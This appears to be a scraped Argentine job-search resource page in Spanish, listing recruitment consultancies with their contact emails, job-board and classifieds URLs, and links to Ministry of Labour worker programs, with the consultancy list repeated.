www.solvens-treat.com.ar/SOLVENS/index.html www.noraferreryasoc.com.ar/home.htm www.serhconsultores.com.ar/frmIngresoCV1.asp SELECTAS RECURSOS HUMANOS www.selectas.net/ Listado y mails de Consultoras y agencias laborales OTT EMPLOYMENT BUREAU employment@ott.edu.ar SELECTAS RECURSOS HUMANOS selectas@interserver.com.ar A&C ANALISTAS Y CONSUL. EN ESTRATEGI ayc-cons@act.net.ar ACUERDO DESARROLLO ORGANIZACIONAL acuerdo@infovia.com.ar ADECCO ARGENTINA S.A. sarmiento@adecco.com.ar ADVISORS BUREAU S.R.L. advisors@jea.datamar.com.ar AGORA SELECCIÓN agora@cvti.com.ar AGROSTAFF agrosrl@infovia.com.ar AGUILAR & ASOCIADOS laguilar@datamarkets.com.ar AINBINDER ABOLSKY CONSULTORES ainabocp@sminter.com.ar AIZENSZLOS & ASOCIADOS ismael@aizen.com.ar ALBERTO MAQUEIRA Y ASOCIADOS agmyasoc@mail.pccp.com.ar ALEJANDRA SALINAS Y ASOCIADOS info@alejandrasalinas.com.ar ALTEA SERVICIOS EMPRESARIOS info@altea-se.com.ar ANA FEUGAS RECURSOS HUMANOS feugas@ciudad.com.ar ANA MAILHE SELECCIÓN DE PERSONAL amailhe@infovia.com.ar ARCHENTI & ASOCIADOS archenti@archenti.com.ar ARTEAGA CONSULTORA RECURSOS HUMA arteaga@sinectis.com.ar ASESORA TEMPORAL SRL Y JÓVENES PRO asesoratemporal@ciudad.com.ar ASSET MARKETING & COMUNICACIÓN rrhh@assetmyc.com B&B CONSULTORES RRHH Y ORGANIZAC. b&bconsultores@interar.com.ar BDO BECHER LICHTENSTEIN & ASOC. info@bdo-argentina.com BEATRIZ CIOCCA & ERNESTO AGUIRRE seleccion@ciocca-aguirre.com.ar BEC CONSULTING GROUP rrhh@bec.com.ar BELISE Y ASOCIADOS belise@ssdnet.com.ar BENDERKY & ASOCIADOS - SELEC. PERSO formulario@bdi.com.ar BERNABEU CONSULTORA bernabeu@movi.com.ar BLUE ARROW SEARCH & SELECCIÓN job@bluearrow.com.ar BOYDEN summers@ictis.com.ar BRAIDOT Y ASOCIADOS CONSULTING BUSIN nba@braidot.com BRS CONS. DE ORGANIZ. Y PERSONAS brs_rrhh@ciudad.com.ar BUREAU CONSULTORES srm@bureaunet.com.ar BUROCONSULT buroconsult@fibertel.com.ar BUSINESS BUREAU businessbureau@businessbureau.com BUSINESS PROCESSES INTERNATIONAL bpicon@arnet.com.ar Business Consulting & Associates. recruitmentbca@ciudad.com.ar C & R CONSULTORES ORGANIZACIONALES crconsul@ba.net C, F & L CONSULTORES ASOCIADOS aniedu@cvtci.com.ar CAAMAÑO & ASOCIADOS caamano@inea.com.ar CÁMARA INTERN. DE COM. DEL MERCOSUR camercosur@uol.com.ar CÁMPORA & CONDOMÍ ALCORTA tacoral@overnet.com.ar CAREER MANAGERS SA clientes@careermanagers.com.ar CASTELLO & ASOCIADOS castelloyasociados@castello-net.com CAVALLERI FORGIA & ASOCIADOS leoforgia@overnet.com.ar CCN CONSULTORES seleccion@ccn.com.ar CEDEPE cedepe@ciudad.com.ar CERVANTES Y ASOCIADOS cervant@mbox.servicenet.com.ar CHAMPS CONSULTORA champs@arnet.com.ar CLAUDIO A. ROITMAN & ASOCIADOS roitman@bigfoot.com CLIENTING GROUP SA dspina@clienting.com.ar CM SOCIOLOGIA DE EMPRESAS cmsearch@cmsociologia.com CODNER & CO cv@codner.com.ar COLES, BORN Y ASOCIADOS consultores@colesborn.com.ar CONSULTORA INSTITUCIONAL consultoras@usa.net CONSULTORA PERSONAL OK SRL okpayroll@ciudad.com.ar COUNSELORS SRL info@counselors.com.ar CP. CONSULTORES EN RR.HH. cpconsult@infovia.com.ar CRISIL CONSULTORES Crisil@datamarkets.com.ar D&A CONSULTORES daconsul@act.net.ar D.V.D DE OLIVIERA, VIDELA & ASOCIADOS C dvd@sadnet.com.ar DE MARTINE Y ASOCIADOS SRL de_martine@hotmail.com DEL PLATA CONSULTORES EN RR HHSA delplata@delplatarrhh.com.ar DELOITTE & TOUCHE - DIV. RR.HH. baoffice@deloitte.com.ar DML CONSULTORES busquedas@dmlconsultores.com.ar DONOSO Y ASOCIADOS donosoas@intersearch.org DOUBLETREE S. A. CONSULTORES - CONSU doubletree@ciudad.com.ar DUET COACHING EN RR.HH. duetcoaching@yahoo.com.ar EASTMAN SELECCIÓN eastman@sudnet.com.ar EBM CONSULTORA ebmmail@datamarkets.com.ar EDUCARE CONSULTORA educare@arnet.com.ar EHQ CONSULTORES EN RR.HH. ehqrrhh@sminter.com.ar ELEONORA TRILNIK & ASOCIADOS consultas@trilnikmarketing.com.ar ENCUADRE & ESTRATEGIAS encuadre@movi.com.ar EPOCA CONSULTORES epoca@teletel.com.ar ESTELA SARRAUTE info@sarraute.com ESTRATEGIAS CONSULTORES EN SELECCI estrategias@arnet.com.ar ESTUDIO GRIEBEN cv@grieben.com.ar ESTUDIO LAGO CONTADORES Y CONSULTO estlago@impsat1.com.ar ESTUDIO LICENCIADO PABLO G. BERMAN pgberman@sinectis.com.ar EXPERTISE S.A. expertise@expertise-sa.com.ar FALOUR BURÓ & ASOCIADOS fb&asoc@overnet.com.ar BELTRANI & ASOCIADOS cv@beltrani.com.ar FERNANDO TEJERO Y ASOCIADOS htejero@mail.peep.com.ar FERNAUD & ASOCIADOS info@sciselection.com.ar FINES SERVICIOS EMPRESARIOS fines-cv@redynet.com.ar FIRMWARE SA info@firmware.com.ar FRANCISCO GARCÍA MARTÍNEZ Y ASOC. serv_personal@ciudad.com.ar FUCHSCONSULT mfuchs@infovia.com.ar G&G CONSULTORA EN RECURSOS HUMANO gygrh@arnet.com.ar GABRIEL SCHWARTZ Y ASOCIADOS gabrielschwartz@yahoo.com.ar GÉCI Y CORNEJO CONSULTORES DE RR.HH gecicornejo@movi.com.ar GHIDINI, RODIL & ASOCIADOS seleccion@ghidinirodil.com.ar GLOBAL SERVICE SA globals@teletel.com.ar GM ESTRATEGIAS ORGANIZACIONALES gmaggiolo@arnet.com.ar GRANT THORNTON AUDITORES Y CONSULT hr@gtarg.com GRECO & LOUZAO CONSULTORES SRL louzao@overnet.com.ar GROSSI CONSULTORES CRITERIA grossi@movi.com.ar GRUPO BRAIN info@grupopbrain.com.ar GUILLERMO FIGUEROA & ASOCIADOS guillermofigueroa@ciudad.com.ar H & F CONSULTORES ASOCIADOS hfconsult@ciudad.com.ar HABERCONF ASOCIADOS SRL haberconf@overnet.com.ar HART CASARES HEADHUNTERS curriculas@hartcasares.com HARTE Y ASOCIADOS harteb@infovia.com.ar HARTENECK-QUIAN & ASOC. DIV. RRHH hartquirh@infovia.com.ar HEAD HUNTER info@head-hunter.com.ar HIDALGO & ASOCIADOS info@bhidalgo.com.ar HORWARTH CONSULTING rrhh@horcan.com.ar HUGO GRANA CONSULTORES info@hugograna.com HUGO T. LEVY & ASOCIADOS consultores@hugotlevy.com.ar HUGO TORRENTE torrente@infovia.com.ar HUMAN CAPITAL CONSULTING SA human@fibertel.com.ar HUMAN INTEGRITY human@satlink.com HUMAN POTENCIAL & BUSINESS SUPPORT spriegel@inea.com.ar IBERSIS - GRUPO UNIÓN FENOSA flaks@ibersis.com INDUSTRIAL RELATIONS & MANAGEMENT C irmc@redynet.com.ar INFOGEN info@infogen.com.ar IRLICHT CONSULORES irlicht@infovia.com.ar J.M CONDOMI ALCORTA CONSULTORES AS tacoral@overnet.com.ar JACHIA MOLINARI & ASOCIADOS jmasoc@ciudad.com.ar JAIME MARISTANY Y ASOCIADOS jmo@jaimemaristany.com.ar JEBSEN & CO. CONSULTING cv@jebsen.com.ar KEEN Y ASOCIADOS CONSULT. EN RR HH lkeen@impsat1.com.ar KPMG - DIVISION EXECUTIVE SEARCH executivesearch@kpmg.com.ar KS & ASOCIADOS ASESORÍA INTEGRAL ksconsultora@fibertel.com.ar LARRIERA Y ASOCIADOS larriera@feedback.net.ar LE SUIVANT lesuivant@overnet.com.ar LEVIMINOND CONSULTORA & ASOCIADOS cv@leviminond.com.ar LIC. ALEX PITASI apitasi@elsitio.com LIC. ELENA WAINRYB Y ASOCIADOS wainryb@infovia.com.ar LIC. LAURA ZANELLA DE BRACCO proyecto.2003@sion.com LIC. NORA GLUZMAN anoragluzman@datamarkets.com.ar LIC. VILABOA & HOLGADO CONSULT. SELEC mholgado@arnet.com.ar Libedinsky & Rottari Consultores en RRHH info@lrconsultores.com.ar LIM ARGENTINA silvialeon@ciudad.com.ar MAB & ASOC mabyasoc@satlink.com.ar MARIANA DREYFUS SELECC. DE PERSONAL sduff@giga.com.ar MAS CONSULTORES DE EMPRESAS ar-executivesearch@ar.pwcglobal.com MBC & ASOCIADOS argentina@movi.com.ar META PRODUCTIVIDAD SRL metaproducti@pinos.com METANOIA metanoia@sinectis.com.ar MG & A mga@overnet.com.ar MOSQUEIRA & RECIO ASESORES EN RRHH jmmr@ba.net MTM HEADHUNTING mtm@ciudad.com.ar NAÓN & TUDURI CONSULT. EN RRHH naontuduri@ciudad.com.ar NIELSEN ASOCIADOS nielsenasoc@infovia.com.ar NORA MOREAU SELECCIÓN noramoreau@ciudad.com.ar NORBERTO BAFFI Y ASOCIADOS SRL nrbcv@aol.com P&T RECURSOS HUMANOS p&trrhh@datamarkets.com.ar PALAZZOLO & ASOCIADOS envio-cv@palazzolo.com.ar PARENTE & ASOCIADOS ppvrd@feedback.net.ar PARODI, SKOWRON & ASOCIADOS parodi.skowron@maderonet.com.ar PARTNERS CONSULTORES EN RRHH partners@cvtci.com.ar PATRICIA VUGA pvuga@yahoo.com PAYROLL RH ventas@payroll.com.ar PIROSKA MELEG Y ASOCIADOS info@piroskayasociados.com.ar PISTACCHIA-PASTORIZA Y ASOCIADOS pispas@impsat1.com.ar PITLUK Y ASOCIADOS RRHH marpit@hotmail.com PRAFERENZ CONSULTORÍA EN RRHH perpra@sinectis.com.ar PRAXIS CONSULTING ESTRATEGIAS EN RRH praxis@cvtci.com.ar PSICOGESTIÓN estudio@psicogestion.com QUALIFICATION SRL qualification@ciudad.com.ar R. BIASCA & ASOCIADOS info@biasca.com R. O. TORREIRO Y ASOCIADOS rotorreiro@interar.com.ar RAÚL BORLENGHI & ASOC. CONSULT. EDUC borlenghi@datamarkets.com.ar RAY & BERNDTSON aarmoni@rayberndston.com RAZZETTO LÓPEZ, RODRÍGUEZ CÓRDOBA & razzetto@inea.com.ar RECIO & ASOCIADOS recio@netizen.com.ar RIAZORT SRL riazort@ssdnet.com.ar SALVAREZZA Y ASOCIADOS laboral@satlink.com SAN MARTÍN SUÁREZ Y ASOCIADOS rrhh@sms.com.ar SANZ Y ASOCIADOS ssanz@satlink.com SELECTIUM raybarm@ibm.net SERGIO GARCÍA Y ASOCIADOS sga@sergiogarciayasociados.com SERH SOLUCIONES EN RRHH serh@arnet.com.ar SERIAL DE LA TORRE CONSULTORES EN RR serialdelatorre@serialsa.com.ar SILVIA CATAIFE Y ASOC. RRHH cataife@fibertel.com.ar SILVIA HASKLER CONSULTORA shaskler@sminter.com.ar SIM SERVICIO INTEGRAL DE MEDIO AMBIEN witold@fibertel.com.ar SÍNTESIS EMPRESARIA SA RRHH sintework@ciudad.com.ar SISTEMAS TEMPORARIOS SA rrhh@sistemastemporarios.com.ar SLS & ASOC. CONSULTORA EN RRHH slscapacitacion@infovia.com.ar SOLVING SRL solv@ssdnet.com.ar STEINHARDT & ASOCIADOS steinhardt@steinhardt-asoc.com.ar SUSANA BISET & ASOCIADOS cv@biset.com.ar SUSANA CRESPO & ASOCIADOS crespo@satlink.com.ar SUSANA HADAD Y ASOCIADOS asesor@ba.net SYNTESYS laboral@syntesys.com.ar SYSTEMS BROKERS SRL rrhh@sbgroup.com.ar T.G. LICENCIADO TORRES GARCÍA RRHH tgrrhh@ciudad.com.ar THE ORGANIZATION DEVELOPMENT INSTITU mabyacoc@satlink.com.ar THOMAS INTERNATIONAL SA argentina@thomaslatin.com TIEMPO REAL CONSULTORES SA cv@tiemporeal.com.ar TOMATI & ASOCIADOS cv@tomati.com TOP SERVICE CONSULTORA SA topserv@sinectis.com.ar TORRES LISTOVSKY & ASOC. SRL gmlisto@einstein.com.ar TRANSEARCH buenosaires@transearch.com TREAT SA answer@solvens-treat.com.ar VON DER HEIDE RECURSOS HUMANOS consultora@vonderheide.com.ar VW CONSULTORES elsa@ssdnet.com.ar WHALECOM RECURSOS HUMANOS Y COMU info@whalecom.com.ar WIN WIN CONSULTORES curriculum@marthaalles.com.ar WORLD SOFWARE SERVICE wssbas@wssgroup.com ZIADE & ASOCIADOS info@ziade.com.ar DDL OUTSOURCING S.R.L. ddl@datamarkets.com.ar SELECCIÓN DE PERSONAL raschinder@concordia.com.ar CAMUSSI & ASOCIADOS camurrhh@arnet.com.ar PM RECURSOS HUMANOS cv@patriciamurphy.com.ar ESTUDIO LICENCIADA GRACIELA BONZINI gracielabonzini@movi.com.ar SILVIA GÉCI Y ASOCIADOS silvgeci@dynamo.com.ar INGENIERIA RITZI ritzi@houseware.com.ar PERSONET personet@fibertel.com.ar AES CONSULTORA aes@way.com.ar CREAR ORGANIZACIÓN DE RR HH crearorh@netverk.com.ar CIMTA SRL -CONSULTOR EN RR.HH busqueda@clubhp.com.ar DR. ROLAND MOESGEN & PARTNER dr_roland_moesgen@ciudad.com.ar CESAR MORCHIO & ASOCIADOS rrhh@cesarmorchio.com CONSULTORA ASTEGIANO SA ingreso@consulas.com.ar INTER CONSULTORA ORGANIZACIONAL olivari@net12.com.ar NORA FERRER Y ASOCIADOS curriculumvitae@noraferreryasoc.com CLAVES CONSULTORA claves@smandes.com.ar DEVSA CONSULTORES devsa@overnet.com.ar RODOLFO ECKE & ASOCIADOS rodolfoecke_asoc@cpsarg.com CONSULTING GROUP consultinggroup@hotmail.com DUBOIS, GONZALEZ & ASOCIADOS CONSUL rdubois@fcecon.unr.edu.ar CSC CONSULTORÍA ESPECIALIZADA EN HOT csc@arnet.com.ar CHOICE HUMAN RESOURCES SRL choice@icatel.net MANPOWER PROFESSIONAL professional@manpower.com.ar fuente ewp.farmaempleos.com.ar/ Google.com.ar trabajo.gov.ar ¿Buscás trabajo? Consejos útiles para la búsqueda de trabajo. Se brinda información orientadora general para esta situación. http://www.trabajo.gob.ar/buscastrabajo/ Call Center (Consultas telefónicas) Consultas y denuncias laborales de todo el país, derivación directa a las áreas responsables. http://www.trabajo.gob.ar/consultas/ Programa Asistir Información y asesoramiento sobre derechos laborales. Facilita en forma gratuita, abogados que pueden representar y patrocinar al trabajador en reclamos judiciales. http://www.trabajo.gob.ar/asistir/ Denuncias Las denuncias efectuadas pueden ser colectivas o individuales, existiendo la posibilidad, en este último caso, de hacerlas en forma anónima. http://www.trabajo.gob.ar/denuncias/ SECLO La misión de la Dirección del SECLO es brindar a los trabajadores y empleadores, con diferendos provenientes de conflictos laborales individuales o pluriindividuales, un ámbito propicio que facilite la negociación de sus intereses con el propósito de arribar a acuerdos consensuados, sujetos a homologación. http://www.trabajo.gob.ar/seclo/ Programa de Apoyo a la Formación Sindical Este programa brinda asistencia técnica y financiera para el desarrollo de actividades de formación sindical, tendientes a fortalecer a las asociaciones sindicales. http://www.trabajo.gob.ar/formacionsindical/ Teletrabajo El teletrabajo, es una forma de desarrollar tareas que requieren una reorganización cultural para la eficiente aplicación de esta innovación. http://www.trabajo.gob.ar/teletrabajo/ Comisión Tripartita de Igualdad de Trato y Oportunidades entre Varones y Mujeres en el Mundo Laboral (CTIO) Esta Comisión es un espacio de interacción entre representantes gubernamentales, sindicales y empresariales para fortalecer la concertación y el diálogo social sobre la igualdad de género en el mundo laboral. http://www.trabajo.gob.ar/ctio/

Laburar en Argentina es una odisea, asi que aca te doy varios links para que puedas conseguir laburo _______________________________________________________________________________________________ PARA PROFESIONALES http://www.emplear.com/pil/index.asp http://www.adecco.com.ar/frame_no.htm http://www.laborum.com http://www.weblaboral1.com.ar/postulantes/Curriculum_Login.asp http://www.ar.computrabajo.com/em-registrar.htm http://ar.bumeran.com/aplicantes/a_home.html http://www.trabajosnet.com/argentina/scrips/postulantes/ http://www.universobit.com http://www.trabajoensistemas.com.ar/ http://www.bumeran.com.ar/ http://www.computrabajo.com.ar/ http://www.centraltech.com.ar/ http://www.bluearrow.com.ar/ http://www.adecco.com.ar/ http://www.cuvitae.com.ar/ http://www.decide.com.ar/ http://www.eiko.com.ar/ http://www.empleo.com.ar/ http://www.empleosweb.com.ar/ http://www.condomialcorta.com.ar/ http://www.jobmarket.com.ar/ http://www.laborum.com/ _______________________________________________________________________________________________ CUALQUIER RUBRO LABORAL http://www.opcionempleo.com.ar http://www.laboris.net http://www.trabajos.com/ www.alejandrasalinas.com.ar www.trabajos.com/ www.brainpeople.com.ar www.empleos.amia.org.ar www.tm-consultores.com.ar/a_formcv.php www.empleosregionales.com.ar www.trabajos.net/jobseekers/ www.guiabuscotrabajo.com.ar www.csglobal.com.ar www.ndconsultores.com.ar www.bsmconsultores.com.ar www.tutorialaboral.com.ar www.menuempleos.com www.canaldeempleo.com.ar www.maxline.com.ar www.bluearrow.com.ar www.oportunidadeslaborales.com _______________________________________________________________________________________________ CLASIFICADOS Clarín http://www.empleos.clarin.com/empleos/jsp/empleos_postulantes.jsp La Nación http://clasificados.lanacion.com.ar/IndexEmpleos.asp _______________________________________________________________________________________________ INGRESO DE CURRICULUM A CONSULTORAS http://www.cvaccenture.com.ar/aplicantes/home.ngmf http://www.eds.com.ar/rrhh/ www.empleos.net www.tm-consultores.com.ar/a_formcv.php www.tutorialaboral.com.ar www.trabajos.net/jobseekers/ _______________________________________________________________________________________________ MAILS DE CONSULTORAS Y AGENCIAS LABORALES Cita : OTT EMPLOYMENT BUREAU employment@ott.edu.ar SELECTAS RECURSOS HUMANOS selectas@interserver.com.ar A&C ANALISTAS Y CONSUL. EN ESTRATEGI ayc-cons@act.net.ar ACUERDO DESARROLLO ORGANIZACIONAL acuerdo@infovia.com.ar ADECCO ARGENTINA S.A. sarmiento@adecco.com.ar ADVISORS BUREAU S.R.L. advisors@jea.datamar.com.ar AGORA SELECCIÓN agora@cvti.com.ar AGROSTAFF agrosrl@infovia.com.ar AGUILAR & ASOCIADOS laguilar@datamarkets.com.ar AINBINDER ABOLSKY CONSULTORES ainabocp@sminter.com.ar AIZENSZLOS & ASOCIADOS ismael@aizen.com.ar ALBERTO MAQUEIRA Y ASOCIADOS agmyasoc@mail.pccp.com.ar ALEJANDRA SALINAS Y ASOCIADOS info@alejandrasalinas.com.ar ALTEA SERVICIOS EMPRESARIOS info@altea-se.com.ar ANA FEUGAS RECURSOS HUMANOS feugas@ciudad.com.ar ANA MAILHE SELECCIÓN DE PERSONAL amailhe@infovia.com.ar ARCHENTI & ASOCIADOS archenti@archenti.com.ar ARTEAGA CONSULTORA RECURSOS HUMA arteaga@sinectis.com.ar ASESORA TEMPORAL SRL Y JÓVENES PRO asesoratemporal@ciudad.com.ar ASSET MARKETING & COMUNICACIÓN rrhh@assetmyc.com B&B CONSULTORES RRHH Y ORGANIZAC. b&bconsultores@interar.com.ar BDO BECHER LICHTENSTEIN & ASOC. info@bdo-argentina.com BEATRIZ CIOCCA & ERNESTO AGUIRRE seleccion@ciocca-aguirre.com.ar BEC CONSULTING GROUP rrhh@bec.com.ar BELISE Y ASOCIADOS belise@ssdnet.com.ar BENDERKY & ASOCIADOS - SELEC. PERSO formulario@bdi.com.ar BERNABEU CONSULTORA bernabeu@movi.com.ar BLUE ARROW SEARCH & SELECCIÓN job@bluearrow.com.ar BOYDEN summers@ictis.com.ar BRAIDOT Y ASOCIADOS CONSULTING BUSIN nba@braidot.com BRS CONS. DE ORGANIZ. Y PERSONAS brs_rrhh@ciudad.com.ar BUREAU CONSULTORES srm@bureaunet.com.ar BUROCONSULT buroconsult@fibertel.com.ar BUSINESS BUREAU businessbureau@businessbureau.com BUSINESS PROCESSES INTERNATIONAL bpicon@arnet.com.ar Business Consulting & Associates. recruitmentbca@ciudad.com.ar C & R CONSULTORES ORGANIZACIONALES crconsul@ba.net C, F & L CONSULTORES ASOCIADOS aniedu@cvtci.com.ar CAAMAÑO & ASOCIADOS caamano@inea.com.ar CÁMARA INTERN. DE COM. DEL MERCOSUR camercosur@uol.com.ar CÁMPORA & CONDOMÍ ALCORTA tacoral@overnet.com.ar CAREER MANAGERS SA clientes@careermanagers.com.ar CASTELLO & ASOCIADOS castelloyasociados@castello-net.com CAVALLERI FORGIA & ASOCIADOS leoforgia@overnet.com.ar CCN CONSULTORES seleccion@ccn.com.ar CEDEPE cedepe@ciudad.com.ar CERVANTES Y ASOCIADOS cervant@mbox.servicenet.com.ar CHAMPS CONSULTORA champs@arnet.com.ar CLAUDIO A. ROITMAN & ASOCIADOS roitman@bigfoot.com CLIENTING GROUP SA dspina@clienting.com.ar CM SOCIOLOGIA DE EMPRESAS cmsearch@cmsociologia.com CODNER & CO cv@codner.com.ar COLES, BORN Y ASOCIADOS consultores@colesborn.com.ar CONSULTORA INSTITUCIONAL consultoras@usa.net CONSULTORA PERSONAL OK SRL okpayroll@ciudad.com.ar COUNSELORS SRL info@counselors.com.ar CP. CONSULTORES EN RR.HH. cpconsult@infovia.com.ar CRISIL CONSULTORES Crisil@datamarkets.com.ar D&A CONSULTORES daconsul@act.net.ar D.V.D DE OLIVIERA, VIDELA & ASOCIADOS C dvd@sadnet.com.ar DE MARTINE Y ASOCIADOS SRL de_martine@hotmail.com DEL PLATA CONSULTORES EN RR HHSA delplata@delplatarrhh.com.ar DELOITTE & TOUCHE - DIV. RR.HH. baoffice@deloitte.com.ar DML CONSULTORES busquedas@dmlconsultores.com.ar DONOSO Y ASOCIADOS donosoas@intersearch.org DOUBLETREE S. A. CONSULTORES - CONSU doubletree@ciudad.com.ar DUET COACHING EN RR.HH. duetcoaching@yahoo.com.ar EASTMAN SELECCIÓN eastman@sudnet.com.ar EBM CONSULTORA ebmmail@datamarkets.com.ar EDUCARE CONSULTORA educare@arnet.com.ar EHQ CONSULTORES EN RR.HH. ehqrrhh@sminter.com.ar ELEONORA TRILNIK & ASOCIADOS consultas@trilnikmarketing.com.ar ENCUADRE & ESTRATEGIAS encuadre@movi.com.ar EPOCA CONSULTORES epoca@teletel.com.ar ESTELA SARRAUTE info@sarraute.com ESTRATEGIAS CONSULTORES EN SELECCI estrategias@arnet.com.ar ESTUDIO GRIEBEN cv@grieben.com.ar ESTUDIO LAGO CONTADORES Y CONSULTO estlago@impsat1.com.ar ESTUDIO LICENCIADO PABLO G. BERMAN pgberman@sinectis.com.ar EXPERTISE S.A. expertise@expertise-sa.com.ar FALOUR BURÓ & ASOCIADOS fb&asoc@overnet.com.ar BELTRANI & ASOCIADOS cv@beltrani.com.ar FERNANDO TEJERO Y ASOCIADOS htejero@mail.peep.com.ar FERNAUD & ASOCIADOS info@sciselection.com.ar FINES SERVICIOS EMPRESARIOS fines-cv@redynet.com.ar FIRMWARE SA info@firmware.com.ar FRANCISCO GARCÍA MARTÍNEZ Y ASOC. serv_personal@ciudad.com.ar FUCHSCONSULT mfuchs@infovia.com.ar G&G CONSULTORA EN RECURSOS HUMANO gygrh@arnet.com.ar GABRIEL SCHWARTZ Y ASOCIADOS gabrielschwartz@yahoo.com.ar GÉCI Y CORNEJO CONSULTORES DE RR.HH gecicornejo@movi.com.ar GHIDINI, RODIL & ASOCIADOS seleccion@ghidinirodil.com.ar GLOBAL SERVICE SA globals@teletel.com.ar GM ESTRATEGIAS ORGANIZACIONALES gmaggiolo@arnet.com.ar GRANT THORNTON AUDITORES Y CONSULT hr@gtarg.com GRECO & LOUZAO CONSULTORES SRL louzao@overnet.com.ar GROSSI CONSULTORES CRITERIA grossi@movi.com.ar GRUPO BRAIN info@grupopbrain.com.ar GUILLERMO FIGUEROA & ASOCIADOS guillermofigueroa@ciudad.com.ar H & F CONSULTORES ASOCIADOS hfconsult@ciudad.com.ar HABERCONF ASOCIADOS SRL haberconf@overnet.com.ar HART CASARES HEADHUNTERS curriculas@hartcasares.com HARTE Y ASOCIADOS harteb@infovia.com.ar HARTENECK-QUIAN & ASOC. DIV. RRHH hartquirh@infovia.com.ar HEAD HUNTER info@head-hunter.com.ar HIDALGO & ASOCIADOS info@bhidalgo.com.ar HORWARTH CONSULTING rrhh@horcan.com.ar HUGO GRANA CONSULTORES info@hugograna.com HUGO T. LEVY & ASOCIADOS consultores@hugotlevy.com.ar HUGO TORRENTE torrente@infovia.com.ar HUMAN CAPITAL CONSULTING SA human@fibertel.com.ar HUMAN INTEGRITY human@satlink.com HUMAN POTENCIAL & BUSINESS SUPPORT spriegel@inea.com.ar IBERSIS - GRUPO UNIÓN FENOSA flaks@ibersis.com INDUSTRIAL RELATIONS & MANAGEMENT C irmc@redynet.com.ar INFOGEN info@infogen.com.ar IRLICHT CONSULORES irlicht@infovia.com.ar J.M CONDOMI ALCORTA CONSULTORES AS tacoral@overnet.com.ar JACHIA MOLINARI & ASOCIADOS jmasoc@ciudad.com.ar JAIME MARISTANY Y ASOCIADOS jmo@jaimemaristany.com.ar JEBSEN & CO. CONSULTING cv@jebsen.com.ar KEEN Y ASOCIADOS CONSULT. EN RR HH lkeen@impsat1.com.ar KPMG - DIVISION EXECUTIVE SEARCH executivesearch@kpmg.com.ar KS & ASOCIADOS ASESORÍA INTEGRAL ksconsultora@fibertel.com.ar LARRIERA Y ASOCIADOS larriera@feedback.net.ar LE SUIVANT lesuivant@overnet.com.ar LEVIMINOND CONSULTORA & ASOCIADOS cv@leviminond.com.ar LIC. ALEX PITASI apitasi@elsitio.com LIC. ELENA WAINRYB Y ASOCIADOS wainryb@infovia.com.ar LIC. LAURA ZANELLA DE BRACCO proyecto.2003@sion.com LIC. NORA GLUZMAN anoragluzman@datamarkets.com.ar LIC. VILABOA & HOLGADO CONSULT. SELEC mholgado@arnet.com.ar Libedinsky & Rottari Consultores en RRHH info@lrconsultores.com.ar LIM ARGENTINA silvialeon@ciudad.com.ar MAB & ASOC mabyasoc@satlink.com.ar MARIANA DREYFUS SELECC. DE PERSONAL sduff@giga.com.ar MAS CONSULTORES DE EMPRESAS ar-executivesearch@ar.pwcglobal.com MBC & ASOCIADOS argentina@movi.com.ar META PRODUCTIVIDAD SRL metaproducti@pinos.com METANOIA metanoia@sinectis.com.ar MG & A mga@overnet.com.ar MOSQUEIRA & RECIO ASESORES EN RRHH jmmr@ba.net MTM HEADHUNTING mtm@ciudad.com.ar NAÓN & TUDURI CONSULT. EN RRHH naontuduri@ciudad.com.ar NIELSEN ASOCIADOS nielsenasoc@infovia.com.ar NORA MOREAU SELECCIÓN noramoreau@ciudad.com.ar NORBERTO BAFFI Y ASOCIADOS SRL nrbcv@aol.com P&T RECURSOS HUMANOS p&trrhh@datamarkets.com.ar PALAZZOLO & ASOCIADOS envio-cv@palazzolo.com.ar PARENTE & ASOCIADOS ppvrd@feedback.net.ar PARODI, SKOWRON & ASOCIADOS parodi.skowron@maderonet.com.ar PARTNERS CONSULTORES EN RRHH partners@cvtci.com.ar PATRICIA VUGA pvuga@yahoo.com PAYROLL RH ventas@payroll.com.ar PIROSKA MELEG Y ASOCIADOS info@piroskayasociados.com.ar PISTACCHIA-PASTORIZA Y ASOCIADOS pispas@impsat1.com.ar PITLUK Y ASOCIADOS RRHH marpit@hotmail.com PRAFERENZ CONSULTORÍA EN RRHH perpra@sinectis.com.ar PRAXIS CONSULTING ESTRATEGIAS EN RRH praxis@cvtci.com.ar PSICOGESTIÓN estudio@psicogestion.com QUALIFICATION SRL qualification@ciudad.com.ar R. BIASCA & ASOCIADOS info@biasca.com R. O. TORREIRO Y ASOCIADOS rotorreiro@interar.com.ar RAÚL BORLENGHI & ASOC. CONSULT. EDUC borlenghi@datamarkets.com.ar RAY & BERNDTSON aarmoni@rayberndston.com RAZZETTO LÓPEZ, RODRÍGUEZ CÓRDOBA & razzetto@inea.com.ar RECIO & ASOCIADOS recio@netizen.com.ar RIAZORT SRL riazort@ssdnet.com.ar SALVAREZZA Y ASOCIADOS laboral@satlink.com SAN MARTÍN SUÁREZ Y ASOCIADOS rrhh@sms.com.ar SANZ Y ASOCIADOS ssanz@satlink.com SELECTIUM raybarm@ibm.net SERGIO GARCÍA Y ASOCIADOS sga@sergiogarciayasociados.com SERH SOLUCIONES EN RRHH serh@arnet.com.ar SERIAL DE LA TORRE CONSULTORES EN RR serialdelatorre@serialsa.com.ar SILVIA CATAIFE Y ASOC. RRHH cataife@fibertel.com.ar SILVIA HASKLER CONSULTORA shaskler@sminter.com.ar SIM SERVICIO INTEGRAL DE MEDIO AMBIEN witold@fibertel.com.ar SÍNTESIS EMPRESARIA SA RRHH sintework@ciudad.com.ar SISTEMAS TEMPORARIOS SA rrhh@sistemastemporarios.com.ar SLS & ASOC. CONSULTORA EN RRHH slscapacitacion@infovia.com.ar SOLVING SRL solv@ssdnet.com.ar STEINHARDT & ASOCIADOS steinhardt@steinhardt-asoc.com.ar SUSANA BISET & ASOCIADOS cv@biset.com.ar SUSANA CRESPO & ASOCIADOS crespo@satlink.com.ar SUSANA HADAD Y ASOCIADOS asesor@ba.net SYNTESYS laboral@syntesys.com.ar SYSTEMS BROKERS SRL rrhh@sbgroup.com.ar T.G. LICENCIADO TORRES GARCÍA RRHH tgrrhh@ciudad.com.ar THE ORGANIZATION DEVELOPMENT INSTITU mabyacoc@satlink.com.ar THOMAS INTERNATIONAL SA argentina@thomaslatin.com TIEMPO REAL CONSULTORES SA cv@tiemporeal.com.ar TOMATI & ASOCIADOS cv@tomati.com TOP SERVICE CONSULTORA SA topserv@sinectis.com.ar TORRES LISTOVSKY & ASOC. SRL gmlisto@einstein.com.ar TRANSEARCH buenosaires@transearch.com TREAT SA answer@solvens-treat.com.ar VON DER HEIDE RECURSOS HUMANOS consultora@vonderheide.com.ar 